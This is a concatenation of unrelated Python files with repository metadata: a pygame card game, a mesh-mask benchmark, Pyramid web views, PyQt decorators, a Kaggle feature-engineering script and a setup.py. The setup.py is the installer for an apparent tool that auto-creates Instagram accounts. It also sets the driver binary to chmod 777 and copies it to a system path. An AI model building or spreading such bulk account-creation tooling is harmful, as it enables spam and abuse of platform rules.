i[2] = i[2]+ suits[2]
for i in range(1,14):
c3_sets_id2.append([str(i),str(i),str(i)])
for j in c3_sets_id2:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_id2:
i[0] = i[0]+ suits[0]
i[1] = i[1]+ suits[1]
i[2] = i[2]+ suits[3]
for i in range(1,14):
c3_sets_id3.append([str(i),str(i),str(i)])
for j in c3_sets_id3:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_id3:
i[0] = i[0]+ suits[0]
i[1] = i[1]+ suits[2]
i[2] = i[2]+ suits[3]
for i in range(1,14):
c3_sets_id4.append([str(i),str(i),str(i)])
for j in c3_sets_id4:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_id4:
i[0] = i[0]+ suits[1]
i[1] = i[1]+ suits[2]
i[2] = i[2]+ suits[3]
f_3_sets=c3_sets_c +c3_sets_d+c3_sets_h+c3_sets_s+c3_sets_id1+c3_sets_id2+c3_sets_id3+c3_sets_id4
c4_sets_c=[]
c4_sets_d=[]
c4_sets_h=[]
c4_sets_s=[]
c4_sets_id=[]
for i in range(1,11):
c4_sets_c.append([str(i),str(i+1),str(i+2),str(i+3)])
c4_sets_c.append([str(1),str(11),str(12),str(13)])
for j in c4_sets_c:
for i in range(4):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c4_sets_c:
for j in range(4):
i[j]=i[j]+suits[0]
for i in range(1,11):
c4_sets_d.append([str(i),str(i+1),str(i+2),str(i+3)])
c4_sets_d.append([str(1),str(11),str(12),str(13)])
for j in c4_sets_d:
for i in range(4):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c4_sets_d:
for j in range(4):
i[j]=i[j]+suits[1]
for i in range(1,11):
c4_sets_h.append([str(i),str(i+1),str(i+2),str(i+3)])
c4_sets_h.append([str(1),str(11),str(12),str(13)])
for j in c4_sets_h:
for i in range(4):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c4_sets_h:
for j in range(4):
i[j]=i[j]+suits[2]
for i in range(1,11):
c4_sets_s.append([str(i),str(i+1),str(i+2),str(i+3)])
c4_sets_s.append([str(1),str(11),str(12),str(13)])
for j in c4_sets_s:
for i in range(4):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c4_sets_s:
for j in range(4):
i[j]=i[j]+suits[3]
for i in range(1,14):
c4_sets_id.append([str(i),str(i),str(i),str(i)])
for j in c4_sets_id:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c4_sets_id:
i[0] = i[0]+ suits[0]
i[1] = i[1]+ suits[1]
i[2] = i[2]+ suits[2]
i[3] = i[3]+ suits[3]
f_4_sets = c4_sets_c+c4_sets_d+c4_sets_h+c4_sets_s+c4_sets_id
def disp():
myfont = pygame.font.Font("FreeSansBold.ttf",34)
mytext = myfont.render("CPU", True, (0,0,0))
screen.blit(mytext, (200,60))
myfont = pygame.font.Font("FreeSansBold.ttf",34)
mytext = myfont.render("YOU", True, (0,0,0))
screen.blit(mytext, (200,620))
myfont = pygame.font.Font("FreeSansBold.ttf",28)
mytext = myfont.render("Points:", True, (191,13,182))
screen.blit(mytext, (100,670))
myfont = pygame.font.Font("FreeSansBold.ttf",28)
mytext = myfont.render(str(sy), True, (23,15,186))
screen.blit(mytext, (250,670))
myfont = pygame.font.Font("FreeSansBold.ttf",28)
mytext = myfont.render("Points:", True, (191,13,182))
screen.blit(mytext, (100,20))
myfont = pygame.font.Font("FreeSansBold.ttf",28)
mytext = myfont.render(str(sc), True, (23,15,186))
screen.blit(mytext, (250,20))
myfont = pygame.font.Font("FreeSansBold.ttf",14)
mytext = myfont.render("1st 3 Cards Set", True, (0,0,0))
screen.blit(mytext, (550,630))
myfont = pygame.font.Font("FreeSansBold.ttf",14)
mytext = myfont.render("2nd 3 Cards Set", True, (0,0,0))
screen.blit(mytext, (800,630))
myfont = pygame.font.Font("FreeSansBold.ttf",14)
mytext = myfont.render("3rd 3 Cards Set", True, (0,0,0))
screen.blit(mytext, (1050,630))
myfont = pygame.font.Font("FreeSansBold.ttf",14)
mytext = myfont.render("4 Cards Set", True, (0,0,0))
screen.blit(mytext, (1325,630))
myfont = pygame.font.Font("FreeSansBold.ttf",14)
mytext = myfont.render("1st 3 Cards Set", True, (0,0,0))
screen.blit(mytext, (550,75))
myfont = pygame.font.Font("FreeSansBold.ttf",14)
mytext = myfont.render("2nd 3 Cards Set", True, (0,0,0))
screen.blit(mytext, (800,75))
myfont = pygame.font.Font("FreeSansBold.ttf",14)
mytext = myfont.render("3rd 3 Cards Set", True, (0,0,0))
screen.blit(mytext, (1050,75))
myfont = pygame.font.Font("FreeSansBold.ttf",14)
mytext = myfont.render("4 Cards Set", True, (0,0,0))
screen.blit(mytext, (1325,75))
screen.blit(pygame.image.load('Image/back111.gif'),(400,300))
#screen.blit(pygame.image.load('Image/done.png'),(50,300))
screen.blit(pygame.image.load('Image/declare.png'),(900,325))
if z==0 :
myfont = pygame.font.Font("FreeSansBold.ttf",38)
mytext = myfont.render("Pick a Card", True, (255,0,0))
screen.blit(mytext, (800,670))
if z==1 :
myfont = pygame.font.Font("FreeSansBold.ttf",38)
mytext = myfont.render("Throw a Card", True, (255,0,0))
screen.blit(mytext, (800,670))
if y%2==0 and y!=0:
myfont = pygame.font.Font("FreeSansBold.ttf",38)
mytext = myfont.render("CPU's Turn", True, (255,0,0))
screen.blit(mytext, (800,20))
if game_lost:
screen.blit(pygame.image.load('Image/you_lose.jpeg'),(0,0))
if game_won:
screen.blit(pygame.image.load('Image/you_won.jpg'),(0,0))
game_won = False
game_lost =False
while play:
screen.fill((30,150,35))
mx,my = pygame.mouse.get_pos()
score_you=[]
score_cpu=[]
for i in range(len(deck)):
screen.blit(pygame.image.load('Image/'+deck[i]+'.gif'),(400,300))
for i in range(len(sample_p)):
screen.blit(pygame.image.load('Image/'+sample_p[i]+'.gif'),(xc + 25* i,y_d))
for i in sample_p:
k=int(i[0:2])
if 2<=k<=9:
score_you.append(k)
if 10<= k <=13 or k==1:
score_you.append(10)
sy=sum(score_you)
for i in range(len(sample_c)):
screen.blit(pygame.image.load('Image/'+sample_c[i]+'.gif'),(xc + 25* i,y_u))
screen.blit(pygame.image.load('Image/back111.gif'),(xc + 25* i,y_u))
for i in sample_c:
k=int(i[0:2])
if 2<=k<=9:
score_cpu.append(k)
if 10<= k <=13 or k==1:
score_cpu.append(10)
sc=sum(score_cpu)
if len(deck_dis) >0:
screen.blit(pygame.image.load('Image/'+deck_dis[len(deck_dis)-1]+'.gif'),(650,300))
else:
screen.blit(pygame.image.load('Image/bottom01.gif'),(650,300))
if len(c3_1_p)==4:
r_1=c3_1_p.pop(0)
sample_p.append(r_1)
for i in range(len(c3_1_p)):
screen.blit(pygame.image.load('Image/'+c3_1_p[i]+'.gif'),(500 + 50*i,500))
if len(c3_2_p)==4:
r_2=c3_2_p.pop(0)
sample_p.append(r_2)
for i in range(len(c3_2_p)):
screen.blit(pygame.image.load('Image/'+c3_2_p[i]+'.gif'),(750 + 50*i,500))
if len(c3_3_p)==4:
r_3=c3_3_p.pop(0)
sample_p.append(r_3)
for i in range(len(c3_3_p)):
screen.blit(pygame.image.load('Image/'+c3_3_p[i]+'.gif'),(1000 + 50*i,500))
if len(c4_p)==5:
r_4=c4_p.pop(0)
sample_p.append(r_4)
for i in range(len(c4_p)):
screen.blit(pygame.image.load('Image/'+c4_p[i]+'.gif'),(1250 + 50*i,500))
if y%2==0 and y!=0:
y=0
sample_c.append(deck[len(deck)-1])
deck.pop()
a=sample_c.pop(0)
deck_dis.append(a)
t_3 = list(itertools.combinations(set(sample_c),3))
u_3 = list(map(list,t_3))
for i in u_3:
v_3.append(sorted(i))
t_4 = list(itertools.combinations(set(sample_c),4))
u_4 = list(map(list,t_4))
for i in u_4:
v_4.append(sorted(i))
s_3=[]
l_3c=[]
s_4=[]
l_4c=[]
for i in v_3:
for j in f_3_sets:
if i==j:
s_3.append(i)
for i in v_4:
for j in f_4_sets:
if i==j:
s_4.append(i)
for i in s_3:
for j in range(3):
l_3c.append(i[j])
for i in s_4:
for j in range(4):
l_4c.append(i[j])
if len(s_4)>=1:
c4_c = s_4[0]
for i in range(len(c4_c)):
screen.blit(pygame.image.load('Image/'+c4_c[i]+'.gif'),(1250 + 50*i,y_u))
screen.blit(pygame.image.load('Image/back111.gif'),(1250 + 50*i,y_u))
for j in range(4):
if s_4[0][j] in sample_c:
sample_c.remove(s_4[0][j])
if len(s_3)>=1:
c3_1_c = s_3[0]
for i in range(len(c3_1_c)):
screen.blit(pygame.image.load('Image/'+c3_1_c[i]+'.gif'),(500 + 50*i,y_u))
screen.blit(pygame.image.load('Image/back111.gif'),(500 + 50*i,y_u))
for j in range(3):
if s_3[0][j] in sample_c:
sample_c.remove(s_3[0][j])
if len(s_3)>=2 and len(set(l_3c[0:6]))==6:
c3_2_c = s_3[1]
for i in range(len(c3_2_c)):
screen.blit(pygame.image.load('Image/'+c3_2_c[i]+'.gif'),(750 + 50*i,y_u))
screen.blit(pygame.image.load('Image/back111.gif'),(750 + 50*i,y_u))
for j in range(3):
if s_3[1][j] in sample_c:
sample_c.remove(s_3[1][j])
if len(s_3)>=3 and len(set(l_3c[0:9]))==9:
c3_3_c = s_3[2]
for i in range(len(c3_3_c)):
screen.blit(pygame.image.load('Image/'+c3_3_c[i]+'.gif'),(1000 + 50*i,y_u))
screen.blit(pygame.image.load('Image/back111.gif'),(1000 + 50*i,y_u))
for j in range(3):
if s_3[2][j] in sample_c:
sample_c.remove(s_3[2][j])
for event in pygame.event.get():
if event.type==MOUSEBUTTONDOWN and event.button==1:
for i in range(len(sample_p)):
if (xc + 25* i) < mx < (xc + 25* (i+1)) and 500<my<650 and z==1 :
y+=1
z-=1
n=sample_p.pop(i)
deck_dis.append(n)
if 650<mx<730 and 300<my<425 and z==0:
y+=1
z+=1
p = deck_dis.pop()
sample_p.append(p)
if 400<mx<480 and 300<my<425 and z==0:
y+=1
z+=1
q=deck.pop()
sample_p.append(q)
if 900<mx<1100 and 325<my<385 and z!=1:
if len(c3_1_p)<3 or len(c3_2_p)<3 or len(c3_3_p)<3 or len(c4_p)<4 or sorted(c3_1_p) or sorted(c3_2_p) or sorted(c3_3_p) not in f_3_sets or sorted(c4_p) not in f_4_sets :
game_lost=True
if 900<mx<1100 and 325<my<385 and sy==0 and z!=1:
if sorted(c3_1_p) and sorted(c3_2_p) and sorted(c3_3_p) in f_3_sets and sorted(c4_p) in f_4_sets:
game_won=True
if event.type==KEYDOWN and event.key ==K_KP1:
for i in range(len(sample_p)):
if (xc + 25* i) < mx < (xc + 25* (i+1)) and 500<my<650:
r=sample_p.pop(i)
c3_1_p.append(r)
if event.type==KEYDOWN and event.key ==K_KP2:
for i in range(len(sample_p)):
if (xc + 25* i) < mx < (xc + 25* (i+1)) and 500<my<650:
r=sample_p.pop(i)
c3_2_p.append(r)
if event.type==KEYDOWN and event.key ==K_KP3:
for i in range(len(sample_p)):
if (xc + 25* i) < mx < (xc + 25* (i+1)) and 500<my<650:
r=sample_p.pop(i)
c3_3_p.append(r)
if event.type==KEYDOWN and event.key ==K_KP4:
for i in range(len(sample_p)):
if (xc + 25* i) < mx < (xc + 25* (i+1)) and 500<my<650:
r=sample_p.pop(i)
c4_p.append(r)
if event.type==KEYDOWN and event.key ==ord('r'):
for i in range(len(c3_1_p)):
if (500 + 50* i) < mx < (500 + 50* (i+1)) and 500<my<650:
r=c3_1_p.pop(i)
sample_p.append(r)
for i in range(len(c3_2_p)):
if (750 + 50* i) < mx < (750 + 50* (i+1)) and 500<my<650:
r=c3_2_p.pop(i)
sample_p.append(r)
for i in range(len(c3_3_p)):
if (1000 + 50* i) < mx < (1000 + 50* (i+1)) and 500<my<650:
r=c3_3_p.pop(i)
sample_p.append(r)
for i in range(len(c4_p)):
if (1250 + 50* i) < mx < (1250 + 50* (i+1)) and 500<my<650:
r=c4_p.pop(i)
sample_p.append(r)
if event.type==KEYDOWN and event.key ==ord('q'):
play = False
if event.type == pygame.QUIT:
play = False
disp()
pygame.display.update() | [
"kishan.sinha18@gmail.com"
] | kishan.sinha18@gmail.com |
aac67577a86224b9db3f14bdf0e54a3151cef1d4 | e7f4d93bf35f496c39cc16b7e33020ff1990881e | /run.py | 84595f396c520561fdbc0b087c3763eba21fa3c8 | [
"MIT"
] | permissive | ajdillhoff/pytorch-mesh-mask | a769bb4865c716ed4c29b4bc82ba28e21325d6f3 | 7f86b2229bce6723666bf4a1494cec79070add32 | refs/heads/master | 2021-06-20T00:26:38.773761 | 2021-02-06T21:09:19 | 2021-02-06T21:09:19 | 181,722,401 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | import time
import torch
import src.MeshMask as mm
from src.util import load_mesh_data
def main():
mesh_path = "Sphere.mesh.xml"
image_height = 100
image_width = 100
mesh_vertices, normals, bone_weights, triangles = load_mesh_data(mesh_path)
mesh = torch.tensor(mesh_vertices, dtype=torch.float32).repeat(32, 1, 1)
print("Input size: {}".format(mesh.shape))
# Mesh Mask
mesh_mask = mm.MeshMask([image_height, image_width],
triangles)
print("**CPU**")
masks = torch.ByteTensor(mesh.shape[0], mesh.shape[1])
s = time.time()
for i in range(mesh.shape[0]):
masks[i] = mesh_mask(mesh[i])
print("Compute time: {}s".format(time.time() - s))
s = time.time()
for i in range(mesh.shape[0]):
temp = mesh[i, masks[i]]
print("Access time: {}s".format(time.time() - s))
mesh_mask.triangles = triangles.cuda()
mesh = mesh.cuda()
print("**CUDA**")
s = time.time()
mask = mesh_mask(mesh)
print("Compute time: {}s".format(time.time() - s))
s = time.time()
for i in range(mesh.shape[0]):
temp = mesh[i, mask[i]]
print("Access time: {}s".format(time.time() - s))
if __name__ == "__main__":
main()
| [
"ajdillhoff@gmail.com"
] | ajdillhoff@gmail.com |
ee143f1efcc713e6d0ebae48abd8d2f0e560c0ad | cf0c4657fd8198b904932a3c924f3c1f22bddd87 | /setup.py | cf7c2a620b5ed21b92440e9125e1ae9bfc4fad00 | [] | no_license | Coconut-System-Engineer/Create-automatic-akun-instagram | 5e46fd2df6c5a3dcd22058a9e009c972340208bd | 00ec28ffed76428a9db7e05f5ad3e3023897ad87 | refs/heads/master | 2021-03-01T03:16:46.573225 | 2020-03-09T06:21:09 | 2020-03-09T06:21:09 | 245,750,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,003 | py | import os
import random
import sys
import time
from time import sleep
os.system('clear')
def mengetik (s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(random.random() * 0.4)
os.system('clear')
sleep(0.1)
print ('Loading...')
sleep(0.1)
mengetik(' > > > > > > > > > > > > > > > > > > > > > > > > > >] 100%')
sleep(1)
def main():
print "\033[1;00m==============================================================================================================="
sleep(0.1)
print "\033[1;91m*********************___________***Auto Create Akun Instagram***___________************************************"
sleep(0.1)
print "* 0000000000000 000000000000 000000000000 000000 000000 00000000000000000000 *"
sleep(0.1)
print "* 000 0000 000000000000 0000000000000 00000000000 000000000 00000000000000000000 *"
sleep(0.1)
print "* 000 00 0000 0000 0000 000000 000000 000000 000000 000000 00 00000 00 *"
sleep(0.1)
print "* 000 00000 0000 0000 000000 00000 00000 00000 00000 00000 *"
sleep(0.1)
print "* 000 000000000000 0000 00000 0000 0000 0000 0000 00000 *"
sleep(0.1)
print "* 000 00000 000000000000 00000000000 0000 0000 0000 0000 00000 *"
sleep(0.1)
print "* 000 00 0000 0000 00000000000 00000 00000 00000 00000 00000 *"
sleep(0.1)
print "* 000 0000 0000 0000 0000 000000 000000 000000 000000 000000 00000 *"
sleep(0.1)
print "* 000 0000 000000000000 0000 000000 00000000000 0000000000 00000 *"
sleep(0.1)
print "* 000000000000 000000000000 0000 000000 000000 000000 00000000000000 *"
sleep(0.1)
print "\033[00m \033[1;94m*********************___________****** C O C O N U T ******___________****************************************"
sleep(0.1)
print "\033[00m==============================================================================================================="
print '\n \033[1;92m > > > silakan tunggu proses penginstalan pakage < < < \n'
sleep(0.1)
os.system("apt-get update && apt-get install python-pip && pip install selenium")
sleep(0.1)
mengetik('> > > > > > > > > > > > > > > > > > > > > > > > >] 100%')
sleep(0.1)
os.system("chmod 777 geckodriver-v0.26.0-linux64/geckodriver")
sleep(0.1)
mengetik('> > > > > > > > > > > > > > > > > > > > > > > > >] 100%')
sleep(0.1)
os.system("cp geckodriver-v0.26.0-linux64/geckodriver /usr/local/bin/")
sleep(0.1)
mengetik('> > > > > > > > > > > > > > > > > > > > > > > > >] 100%')
sleep(0.1)
print '\n \033[1;00m\033[1;94m*************** __________Selelsai__________ ***************'
main()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
2f5c1ccb3a93ecdc0881568dd20c5919318f89e3 | 4e2ad17d96e7ba608735416bb917d8511656c0f4 | /9.4[nice qn].py | bb6d7323b12db81d539dc5528d618c709bd53e11 | [] | no_license | gadia-aayush/Python_for_Informatics-Solutions | 140af49da7c5277b2065a53407af58a7e6459106 | 356155a0ce82194522f2bcd2472ababea7b0d2d8 | refs/heads/master | 2021-09-26T13:38:54.593015 | 2018-10-30T18:14:26 | 2018-10-30T18:14:26 | 111,910,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 726 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 20 21:40:40 2017
@author: aayushgadia
"""
i=0
sender_list=[]
filename=input('Enter a file name: ')
f_in=open(filename)
for line in f_in:
if line.startswith('From '):
word_list=line.split()
sender=word_list[1]
sender_list.append(sender)
print(sender_list,'\n')
d=dict()
for sent in sender_list:
if sent not in d:
d[sent]=1
else:
d[sent]+=1
print(d)
new_d={}
for k,v in d.items():
new_d[v]=k
if v>i:
i=v
continue
else:
continue
print(new_d)
print('\nMaximum messages is by',new_d[i],'with',i,'messages')
| [
"noreply@github.com"
] | noreply@github.com |
373036442caf5434eca6150ae45a796bba5f9009 | d8ffe7b6613d84835e2b7f9a2984dd78770e1885 | /opensupply/views/requisition.py | e11b7474f257b9f58c374b8a82e8420ed29c174d | [] | no_license | etoko/opensupply | 248cfb58c0b745df48272f2b705774c6a73c546b | 04d674cc57c2f20b0b87f51c1a85c8a98b05055a | refs/heads/master | 2020-04-05T12:34:42.770428 | 2017-08-01T04:25:13 | 2017-08-01T04:25:13 | 95,153,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,247 | py |
import json
from datetime import datetime
import transaction
from pyramid.httpexceptions import (
exception_response,
HTTPFound,
HTTPNotFound,
HTTPForbidden,
)
from pyramid.renderers import render_to_response
from pyramid.response import Response
from pyramid.static import static_view
from pyramid.security import authenticated_userid, forget, remember
from pyramid.view import view_config
from sqlalchemy.exc import IntegrityError
from opensupply.controllers import (
RequisitionController,
DepartmentController,
UserController,
PermissionController,
)
from opensupply.security import USERS
from opensupply.models import User
from opensupply.util import operations
from opensupply.models import DBSession
requisition_controller = RequisitionController()
user_controller = UserController()
permission_controller = PermissionController()
department_controller = DepartmentController()
@view_config(route_name = "requisitions_first", renderer="json")
def requisition_first(request):
"""
View to navigate to the first requisition
"""
requisition = requisition_controller.get(FIRST=True)
return requisition.to_dict
@view_config(route_name="requisitions_previous", renderer="json")
def requisition_previous(request):
"""
Navigate to previous requisition
"""
# requisition_id = request.params["requisition_id"]
# requisition_id = int(requisition_id)
# requisition_id = requisition_id - 1
# requisition = requisition_controller.get(requisition_id)
#requisition_id = request.params["requisition_id"]
#requisition_id = int(requisition_id)
#requisition = requisition_controller.get(requisition_id)
#requisition = requisition.previous()
#j_requisition = json.dumps(requisition.to_dict)
requisition_id = request.params["requisition_id"]
requisition = requisition_controller.get(requisition_id)
requisition = requisition.previous()
return requisition.to_dict
@view_config(route_name="requisitions_next", renderer="json")
def requisition_next(request):
"""
Navigate to previous requisition
"""
#requisition_id = request.params["requisition_id"]
#requisition_id = int(requisition_id)
#requisition_id = requisition_id + 1
#requisition = requisition_controller.get(requisition_id)
#requisition = requisition.next()
#j_requisition = json.dumps(requisition.to_dict)
#return j_requisition
requisition_id = request.params["requisition_id"]
requisition = requisition_controller.get(requisition_id)
requisition = requisition.next()
return requisition.to_dict
@view_config(route_name="requisitions_last", renderer="json")
def requisition_last(request):
"""
View to navigate to the last requisition
"""
requisition = requisition_controller.get(LAST=True)
return requisition.to_dict
@view_config(route_name="requisitions_save", renderer="json")
def requisition_save(request):
"""
Called after user clicks save button
"""
j_requisition = {}
requisition_id = request.params['requisition_id']
department_id = request.params["requisition_department"]
expected_date = request.params["requisition_expected_date"]
j_requisition = {
'requisition_id' : requisition_id,
'department_id': department_id,
'expected_date': expected_date,
#'notes': notes
}
requisition = requisition_controller.save(j_requisition)
return requisition.to_dict
@view_config(route_name="requisitions_delete", renderer="json")
def requisition_delete(request):
"""
Called to invoke a delete operation
"""
requisition_id = request.params["requisition_id"]
requisition = requisition_controller.get(requisition_id)
next_requisition = requisition.next()
print(next_requisition)
if requisition_controller.delete(requisition):
return json.dumps(next_requisition.to_dict)
| [
"emmanuel.toko@gmail.com"
] | emmanuel.toko@gmail.com |
fad2bafe876e26e6aeabeb0f5e9d3bccfbba8ef8 | 788874e01754f6634b536eeac43552063c105a43 | /functions/decorators.py | 33ac645eff6d1c48a3ed374be3f273ce51a73a4a | [] | no_license | ycli0536/GeoModeling | 1e73508810212bf5c847a73dfe4649bd906e132f | 57197bbde0a472e77144647467fbd7553973a7f6 | refs/heads/master | 2023-06-10T20:28:58.822419 | 2021-06-30T07:04:40 | 2021-06-30T07:04:40 | 368,754,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,148 | py | from PyQt5.QtWidgets import QMessageBox
def track_error(func):
def wrapper(self):
try:
func(self)
except Exception as e:
QMessageBox.information(self, 'Test Error', str(e), QMessageBox.Yes)
return wrapper
def track_error_args(func):
def wrapper(self, *args, **kwargs):
try:
result = func(self, *args, **kwargs)
return result
except Exception as e:
QMessageBox.information(self, 'Test Error', str(e), QMessageBox.Yes)
return wrapper
def finished_reminder(func):
def wrapper(self):
func(self)
QMessageBox.information(self, 'Finished', 'Task finished.', QMessageBox.Yes)
return wrapper
def finished_reminder_new(win_title, info):
def deco_func(func):
def wrapper(self):
func(self)
QMessageBox.information(self, win_title, info, QMessageBox.Yes)
return wrapper
return deco_func()
def not_finished_yet(func):
def wrapper(self):
func(self)
QMessageBox.information(self, 'Information', 'NOT FINISHED YET...', QMessageBox.Yes)
return wrapper
| [
"lyc05366627@gmail.com"
] | lyc05366627@gmail.com |
a8bf5034a92d0e71d35bafc0166787ac78929292 | 98d7cc2690c8d632a2a8d8867c0d6b2dfab2f13f | /code_featureEngineer/demo0226_logVolDic_discrete01location_missingValue_xgboost_differentFea.py~ | e99a70652af3459398ad05ce2bcfa95483c20b6f | [] | no_license | 2877992943/telstra_binary_classification | f55b6d418486881193f0f3b3eca32d0de710a08a | f3d6fe2e25cd7539c30dbdcd617e2513b2678cce | refs/heads/master | 2021-01-01T05:14:31.284945 | 2016-05-13T02:21:10 | 2016-05-13T02:21:10 | 58,692,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,875 | #!/usr/bin/env python
# encoding=utf-8
"""
discrete fea count
"""
import pandas as pd
import numpy as np
import xgboost as xgb
from scipy.optimize import fmin_powell
from ml_metrics import quadratic_weighted_kappa
import cPickle
import pylab as plt
dataPath='/home/yr/telstra/'
def eval_wrapper(yhat, y): #pred true
y = np.array(y);print y[:10]
y = y.astype(int);print yhat[:10]
yhat = np.array(yhat)
#yhat = np.clip(np.round(yhat), np.min(y), np.max(y)).astype(int)
#####accuracy
#err=np.sum((y-yhat)*(y-yhat))/float(y.shape[0])
#return err
#######-loglikely
return np.mean(-np.log(yhat+0.00001)*y-(1.-y)*np.log(1.-yhat+0.00001) )
#return quadratic_weighted_kappa(yhat, y)
def get_params(maxDepth):
plst={
"objective": 'multi:softprob',#"binary:logistic",
"booster": "gbtree",
"eval_metric": "auc",
"eta": 0.01, # 0.06, #0.01,
#"min_child_weight": 240,
"silent":1,
"subsample": 0.75,
"colsample_bytree": 0.68,
"max_depth": maxDepth,
"num_class":3
}
return plst
def pad(train):
train.v22.fillna('',inplace=True)
padded=train.v22.str.pad(4)
spadded=sorted(np.unique(padded))
v22_map={}
c=0
for i in spadded:
v22_map[i]=c
c+=1
train.v22=padded.replace(v22_map,inplace=False)
return train
def save2pickle(c,name):
write_file=open(dataPath+str(name),'wb')
cPickle.dump(c,write_file,-1)#[ (timestamp,[motion,x,y,z]),...]
write_file.close()
def load_pickle(path_i):
f=open(path_i,'rb')
data=cPickle.load(f)#[ [time,[xyz],y] ,[],[]...]
f.close()
#print data.__len__(),data[0]
return data
def str2dummy(fea_xi,allFeaList,logVolumeDic_xi):#allFeaList [string,...]1921
#print 'fea xi',len(fea_xi) #9 nonzero dimention->1920dim 0-1 vec
vec01=[]
#remove volume(int) in fea_xi,allFeaList
#allFeaList=[f for f in allFeaList if type(f)==str]
#fea_xi=[f for f in fea_xi if type(f)==str ]
#
for fi in allFeaList:#for each string_fea in 1921 ,include: string int
if fi in fea_xi:#'log_feature'
#print fi
v=[logVolumeDic_xi[fi] if type(fi)==str and 'feature' in fi else 1][0]
vec01.append(v)
else:vec01.append(0)
return np.array(vec01)
def get_logVolume(patch):
dic={}
log=np.unique(patch.log_feature.values)
for logI in log:
volumeI=np.unique(patch[patch.log_feature==logI].volume.values)[0]
dic[logI]=volumeI
return dic
def howMany(strFi_short,strList_xi):
num=0
for strI in strList_xi:
if type(strI)==str and strFi_short in strI:
num+=1;#print strI
return num
def uniqueInorder(strArr) : #arr[str] ->list
lis=[]
for strI in strArr:
if strI not in lis:lis.append(strI)
return lis
def normal(xi_dic,normDic):#{'severity_type': 1, 'location': 1, 'event_type': 11, 'resource_type': 5, 'feature': 20}
for k,v in normDic.items():
while len(xi_dic[k])<v:
xi_dic[k].append(-1)
#xi={'event_type': ['34', '35', -1, -1, -1, -1, -1, -1, -1, -1, -1], 'feature': ['312', '232', -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1], 'severity_type': ['2'], 'volume': [11, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1], 'location': ['460'], 'resource_type': ['2', -1, -1, -1, -1]}
#get values ,transform into int
return xi_dic
if __name__=='__main__':
#load ->merge ->count_value each fea->factorize ->fillna -> knn mean-> train cross valid
# XGBoost params:
print('Load data...')
train = pd.read_csv("../input/train.csv");
#print train.location.value_counts(),train.fault_severity.value_counts()
print '--train.csv'
for col in train.columns:
print col
print np.unique(train[col].values).shape
event_type=pd.read_csv('../input/event_type.csv')
print '--event_type.csv'
for col in event_type.columns:
print col
print np.unique(event_type[col].values).shape
log_feature=pd.read_csv('../input/log_feature.csv')
print '--log_feature.csv'
for col in log_feature.columns:
print col
print np.unique(log_feature[col].values).shape
resource_type=pd.read_csv('../input/resource_type.csv')
print '--resource_type.csv'
for col in resource_type.columns:
print col
print np.unique(resource_type[col].values).shape
severity_type=pd.read_csv('../input/severity_type.csv')
print '--severity_type.csv'
for col in severity_type.columns:
print col
print np.unique(severity_type[col].values).shape
target = train['fault_severity'];save2pickle(target.values,'target')
#train = train.drop(['ID','target'],axis=1)
test = pd.read_csv("../input/test.csv")
print '--test.csv'
for col in test.columns:
print col
print np.unique(test[col].values).shape
#ids = test['ID'].values
#test = test.drop(['ID'],axis=1)
####
###transform dataframe
trainTest=pd.concat([train,test],axis=0);print trainTest.values.shape
merge1=pd.merge(trainTest,event_type,on='id',how='left')
merge2=pd.merge(merge1,log_feature,on='id',how='left')
merge3=pd.merge(merge2,resource_type,on='id',how='left')
merge4=pd.merge(merge3,severity_type,on='id',how='left')
uniqueId= np.unique(merge4.id.values)
dataDic_count={};targetDic={};
mat=merge4.drop(['id','fault_severity'],axis=1).values;print mat.shape
allFeaList=list(np.unique(mat.flatten() ) )
print len(allFeaList)
for idi in uniqueId[:]:
#for each id
patch= merge4[ merge4['id']==idi ]
target=np.unique(patch.fault_severity.values)[0]
#print 'xi',patch
patch=patch.drop(['id','fault_severity'],axis=1)
#
#logVolumeDic=get_logVolume(patch);
#print logVolumeDic
#
#fea_xi discrete ->count
#{'event_type': ['34', '35'], 'feature': ['312', '232'], 'severity_type': ['2'], 'volume': [11, 6], 'location': ['460'], 'resource_type': ['2']}
fea_xi={}
for col in patch.columns:
fiStrList=uniqueInorder(patch[col].values)#['event 1','event 3',]
if type(fiStrList[0])==str: #['fea 1','fea 3']
for fi in fiStrList:
k,v= fi.split(' ')#'event_type 3'->['event_type','3']
if k not in fea_xi:fea_xi[k]=[v]
else:fea_xi[k].append(v)
else:#[ 4 5]volume
fea_xi['volume']=fiStrList
#get dummy fea
#fea01=str2dummy(fea_xi,allFeaList,logVolumeDic)#array [1000,]
#print fea01[np.nonzero(fea01)[0]],fea01.shape
#print fea_xi
#dataDic[idi]=fea01;#print fea01.shape
#fea_xi=normal(fea_xi,{'severity_type': 1, 'location': 1, 'event_type': 11, 'resource_type': 5, 'feature': 20,'volume':20})
#print fea_xi,fea_xi.values()
count={}
count['event_type_num']=len(fea_xi['event_type'])
count['resource_type_num']=len(fea_xi['event_type'])
count['feature_num']=len(fea_xi['feature'])
count['volume_num']=sum(fea_xi['volume'])
#feaXiList=[int(xii) for xi in fea_xi.values() for xii in xi ]
#print count
#print feaXiList,len(feaXiList)
dataDic_count[idi]=count.values()
targetDic[idi]=target
#print dataDic,targetDic
save2pickle([dataDic_count,targetDic,allFeaList],'dataTargetFeaAll_count')
#########
#get 01fea 1900(all01 include location),790(all01 except for location),combine count fea
#########
